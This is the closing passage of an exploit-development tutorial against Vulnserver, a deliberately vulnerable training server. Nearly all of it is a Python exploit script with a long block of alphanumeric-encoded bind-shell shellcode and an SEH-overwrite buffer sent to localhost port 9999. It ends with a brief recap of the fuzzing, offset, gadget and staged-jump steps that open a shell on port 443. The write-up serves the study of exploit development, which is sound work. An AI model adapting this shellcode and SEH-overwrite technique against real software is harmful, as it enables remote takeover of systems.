stage4 += "\x05\x70\x65\x62\x10" ## add eax, 0x10626570
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x33\x26\x57\x66" ## add eax, 0x66572633
stage4 += "\x05\x32\x26\x46\x55" ## add eax, 0x55462632
stage4 += "\x05\x32\x24\x45\x46" ## add eax, 0x46452432
stage4 += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x55\x61\x40\x33" ## add eax, 0x33406155
stage4 += "\x05\x44\x51\x40\x32" ## add eax, 0x32405144
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x51\x34\x73\x66" ## add eax, 0x66733451
stage4 += "\x05\x40\x24\x74\x66" ## add eax, 0x66742440
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x36\x33\x64\x56" ## add eax, 0x56643336
stage4 += "\x05\x45\x24\x54\x55" ## add eax, 0x55542445
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x46\x73\x13\x61" ## add eax, 0x61137346
stage4 += "\x05\x45\x63\x03\x61" ## add eax, 0x61036345
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x70\x50\x76\x30" ## add eax, 0x30765070
stage4 += "\x05\x60\x50\x75\x40" ## add eax, 0x40755060
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x03\x23\x72\x73" ## add eax, 0x73722303
stage4 += "\x05\x02\x12\x71\x62" ## add eax, 0x62711202
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x32\x37\x12\x14" ## add eax, 0x14123732
stage4 += "\x05\x32\x27\x01\x14" ## add eax, 0x14012732
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x21\x16\x46\x74" ## add eax, 0x74461621
stage4 += "\x05\x21\x15\x35\x64" ## add eax, 0x64351521
stage4 += "\x05\x21\x16\x33\x54" ## add eax, 0x54331621
stage4 += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x47\x66\x32\x25" ## add eax, 0x25326647
stage4 += "\x05\x46\x56\x31\x24" ## add eax, 0x24315646
stage4 += "\x05\x35\x64\x22\x24" ## add eax, 0x24226435
stage4 += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x53\x04\x66\x62" ## add eax, 0x62660453
stage4 += "\x05\x42\x04\x56\x61" ## add eax, 0x61560442
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x76\x47\x26\x66" ## add eax, 0x66264776
stage4 += "\x05\x66\x47\x15\x56" ## add eax, 0x56154766
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x42\x13\x42\x47" ## add eax, 0x47421342
stage4 += "\x05\x32\x22\x42\x46" ## add eax, 0x46422232
stage4 += "\x05\x32\x12\x42\x35" ## add eax, 0x35421232
stage4 += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x76\x01\x70\x67" ## add eax, 0x67700176
stage4 += "\x05\x65\x01\x70\x56" ## add eax, 0x56700165
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x13\x27\x66\x26" ## add eax, 0x26662713
stage4 += "\x05\x23\x16\x65\x26" ## add eax, 0x26651623
stage4 += "\x05\x13\x25\x46\x24" ## add eax, 0x24462513
stage4 += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x61\x11\x32\x30" ## add eax, 0x30321161
stage4 += "\x05\x61\x01\x41\x20" ## add eax, 0x20410161
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x16\x63\x74\x66" ## add eax, 0x66746316
stage4 += "\x05\x26\x53\x64\x55" ## add eax, 0x55645326
stage4 += "\x05\x14\x33\x53\x34" ## add eax, 0x34533314
stage4 += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x55\x43\x73\x71" ## add eax, 0x71734355
stage4 += "\x05\x55\x43\x73\x61" ## add eax, 0x61734355
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x64\x64\x67\x43" ## add eax, 0x43676464
stage4 += "\x05\x54\x53\x56\x33" ## add eax, 0x33565354
stage4 += "\x05\x63\x63\x35\x33" ## add eax, 0x33356363
stage4 += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x55\x62\x16\x15" ## add eax, 0x15166255
stage4 += "\x05\x55\x61\x05\x15" ## add eax, 0x15056155
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x11\x26\x66\x56" ## add eax, 0x56662611
stage4 += "\x05\x10\x16\x65\x45" ## add eax, 0x45651610
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x57\x74\x60\x57" ## add eax, 0x57607457
stage4 += "\x05\x47\x74\x50\x47" ## add eax, 0x47507447
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x71\x56\x73\x35" ## add eax, 0x35735671
stage4 += "\x05\x60\x45\x63\x45" ## add eax, 0x45634560
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x76\x76\x16\x43" ## add eax, 0x43167676
stage4 += "\x05\x65\x65\x26\x32" ## add eax, 0x32266565
stage4 += "\x05\x54\x54\x14\x32" ## add eax, 0x32145454
stage4 += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x33\x35\x61\x22" ## add eax, 0x22613533
stage4 += "\x05\x43\x25\x50\x22" ## add eax, 0x22502543
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x54\x67\x11\x71" ## add eax, 0x71116754
stage4 += "\x05\x54\x67\x10\x71" ## add eax, 0x71106754
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x13\x63\x71\x54" ## add eax, 0x54716313
stage4 += "\x05\x02\x52\x61\x44" ## add eax, 0x44615202
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x75\x67\x55\x35" ## add eax, 0x35556775
stage4 += "\x05\x75\x57\x45\x25" ## add eax, 0x25455775
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x13\x67\x37\x37" ## add eax, 0x37376713
stage4 += "\x05\x04\x57\x26\x26" ## add eax, 0x26265704
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x63\x11\x11\x31" ## add eax, 0x31111163
stage4 += "\x05\x63\x21\x21\x32" ## add eax, 0x32212163
stage4 += "\x05\x43\x11\x11\x21" ## add eax, 0x21111143
stage4 += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x14\x41\x60\x14" ## add eax, 0x14604114
stage4 += "\x05\x04\x40\x50\x04" ## add eax, 0x04504004
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x17\x23\x26\x55" ## add eax, 0x55262317
stage4 += "\x05\x06\x14\x15\x55" ## add eax, 0x55151406
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x33\x37\x12\x53" ## add eax, 0x53123733
stage4 += "\x05\x32\x47\x11\x52" ## add eax, 0x52114732
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x25\x36\x40\x31" ## add eax, 0x31403625
stage4 += "\x05\x15\x26\x40\x30" ## add eax, 0x30402615
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x26\x37\x07\x75" ## add eax, 0x75073726
stage4 += "\x05\x15\x36\x06\x74" ## add eax, 0x74063615
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x53\x72\x74\x15" ## add eax, 0x15747253
stage4 += "\x05\x42\x72\x74\x04" ## add eax, 0x04747242
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x67\x63\x32\x31" ## add eax, 0x31326367
stage4 += "\x05\x66\x62\x22\x22" ## add eax, 0x22226266
stage4 += "\x05\x45\x42\x22\x21" ## add eax, 0x21224245
stage4 += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x52\x31\x32\x12" ## add eax, 0x12323152
stage4 += "\x05\x41\x30\x21\x12" ## add eax, 0x12213041
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x36\x44\x11\x36" ## add eax, 0x36114436
stage4 += "\x05\x35\x44\x12\x35" ## add eax, 0x35124435
stage4 += "\x05\x36\x33\x11\x33" ## add eax, 0x33113336
stage4 += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x57\x33\x60\x16" ## add eax, 0x16603357
stage4 += "\x05\x46\x42\x60\x15" ## add eax, 0x15604246
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x37\x10\x17\x11" ## add eax, 0x11171037
stage4 += "\x05\x27\x10\x07\x01" ## add eax, 0x01071027
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x66\x61\x47\x41" ## add eax, 0x41476166
stage4 += "\x05\x56\x61\x36\x41" ## add eax, 0x41366156
stage4 += "\x05\x64\x41\x35\x41" ## add eax, 0x41354164
stage4 += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x34\x63\x21\x17" ## add eax, 0x17216334
stage4 += "\x05\x23\x53\x21\x16" ## add eax, 0x16215323
stage4 += "\x05\x23\x63\x21\x15" ## add eax, 0x15216323
stage4 += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x21\x24\x27\x53" ## add eax, 0x53272421
stage4 += "\x05\x12\x14\x26\x43" ## add eax, 0x43261412
stage4 += "\x05\x21\x24\x25\x43" ## add eax, 0x43252421
stage4 += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x25\x36\x46\x16" ## add eax, 0x16463625
stage4 += "\x05\x24\x45\x45\x16" ## add eax, 0x16454524
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x44\x67\x63\x41" ## add eax, 0x41636744
stage4 += "\x05\x34\x56\x53\x41" ## add eax, 0x41535634
stage4 += "\x05\x34\x65\x42\x31" ## add eax, 0x31426534
stage4 += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x24\x46\x46\x57" ## add eax, 0x57464624
stage4 += "\x05\x24\x45\x45\x46" ## add eax, 0x46454524
stage4 += "\x05\x24\x33\x34\x45" ## add eax, 0x45343324
stage4 += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x33\x11\x34\x46" ## add eax, 0x46341133
stage4 += "\x05\x32\x12\x34\x45" ## add eax, 0x45341232
stage4 += "\x05\x22\x11\x34\x46" ## add eax, 0x46341122
stage4 += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x13\x76\x41\x36" ## add eax, 0x36417613
stage4 += "\x05\x23\x65\x42\x36" ## add eax, 0x36426523
stage4 += "\x05\x13\x56\x41\x24" ## add eax, 0x24415613
stage4 += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x07\x02\x21\x55" ## add eax, 0x55210207
stage4 += "\x05\x07\x01\x20\x54" ## add eax, 0x54200107
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x63\x02\x21\x33" ## add eax, 0x33210263
stage4 += "\x05\x64\x02\x10\x24" ## add eax, 0x24100264
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x65\x61\x32\x42" ## add eax, 0x42326165
stage4 += "\x05\x64\x50\x21\x41" ## add eax, 0x41215064
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x54\x73\x16\x26" ## add eax, 0x26167354
stage4 += "\x05\x43\x62\x15\x15" ## add eax, 0x15156243
stage4 += "\x05\x43\x52\x13\x23" ## add eax, 0x23135243
stage4 += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x45\x73\x65\x13" ## add eax, 0x13657345
stage4 += "\x05\x44\x74\x55\x03" ## add eax, 0x03557444
stage4 += "\x50" ## push eax
payload = ""
payload += vuln_command
payload += stage4
payload += "A" * (offset - len(stage1) - 73 - len(stage4))
payload += stage3
payload += "B" * (73 - len(stage3))
payload += stage1
payload += seh
payload += "C" * 2
payload += stage2
payload += "C" * (crash - 4 - offset - 2 - len(stage2))
print "[+] Sending buffer (Size: %d)" % len(payload)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('127.0.0.1', 9999))
print(s.recv(1024))
s.send(payload)
s.close()
Once we run the final_lter.py script, we can successfully open up the bind shell on the port 443.
Conclusion
For the recap:
- We fuzzed the vulnserver LTER command.
- Found the entry point with vulnerable command of LTER.
- Identified bad characters.
- Found the offset to control over SEH overwrite.
- Found the bad character free POP POP RET gadget address.
- [#1 Stage Shellcode] Conditional JMP (nSEH) with 4-byte.
- [#2 Stage Shellcode] Encoded Short JMP (\xEB\x80) with 50-byte.
- [#3 Stage Shellcode] Encoded Long JMP (PUSH ESP → POP EBX → subtract necessary bytes → CALL EBX) with 67-byte.
- [#4 Stage Shellcode] Encoded Bind Shell. Used Slink to encode the msfvenom bind shell.
Hope you also learned something from it. Thanks for reading!
[ExpDev] Vulnserver — Part 7 was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.
Hacker's Directory 